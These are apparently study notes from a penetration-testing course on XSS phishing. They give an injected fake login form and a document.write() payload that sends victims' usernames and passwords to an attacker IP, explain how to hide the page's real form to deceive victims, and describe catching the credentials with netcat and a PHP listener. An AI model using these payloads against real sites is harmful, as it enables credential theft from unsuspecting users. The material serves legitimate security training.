search

XSS Phishing

hashtag
Login Form Injection

<h3>Please login to continue</h3>
<form action=http://10.10.14.146:8000>
    <input type="username" name="username" placeholder="Username">
    <input type="password" name="password" placeholder="Password">
    <input type="submit" name="submit" value="Login">
</form>

In the above HTML code, OUR_IP is the IP of our VM, which we can find with the (ip a) command under tun0.

To write HTML code to the vulnerable page, we can use the JavaScript function document.write(), and use it in the XSS payload we found earlier in the XSS Discovery step. Once we minify our HTML code into a single line and add it inside the write function, the final JavaScript code should be as follows:

document.write('<h3>Please login to continue</h3><form action=http://10.10.14.146:8000><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');

hashtag
Cleaning Up

We can see that the URL field is still displayed, which defeats our line of "Please login to continue". So, to encourage the victim to use the login form, we should remove the URL field, such that they may think that they have to log in to be able to use the page. To do so, we can use the JavaScript function document.getElementById().remove() function.

To find the id of the HTML element we want to remove, we can open the Page Inspector Picker by clicking [CTRL+SHIFT+C] and then clicking on the element we need:

As we see in both the source code and the hover text, the url form has the id urlform:

So, we can now use this id with the remove() function to remove the URL form:

Now, once we add this code to our previous JavaScript code (after the document.write function), we can use this new JavaScript code in our payload:

After, we write the function <script></script> and remove comments with <!--

hashtag
Credential Stealing

To do so, we can start listening on port 80 in our Pwnbox, as follows:

Now, let's attempt to login with the credentials test:test, and check the netcat output we get (don't forget to replace OUR_IP in the XSS payload with your actual IP):

As we can see, we can capture the credentials in the HTTP request URL (/?username=test&password=test). If any victim attempts to log in with the form, we will get their credentials.

However, as we are only listening with a netcat listener, it will not handle the HTTP request correctly, and the victim would get an Unable to connect error, which may raise some suspicions

The following PHP script should do what we need, and we will write it to a file on our VM that we'll call index.php and place it in /tmp/tmpserver/ (don't forget to replace SERVER_IP with the ip from our exercise):

Now that we have our index.php file ready, we can start a PHP listening server, which we can use instead of the basic netcat listener we used earlier:

PreviousXSS BasicsNextBlind XSS - Session Hijacking

Last updated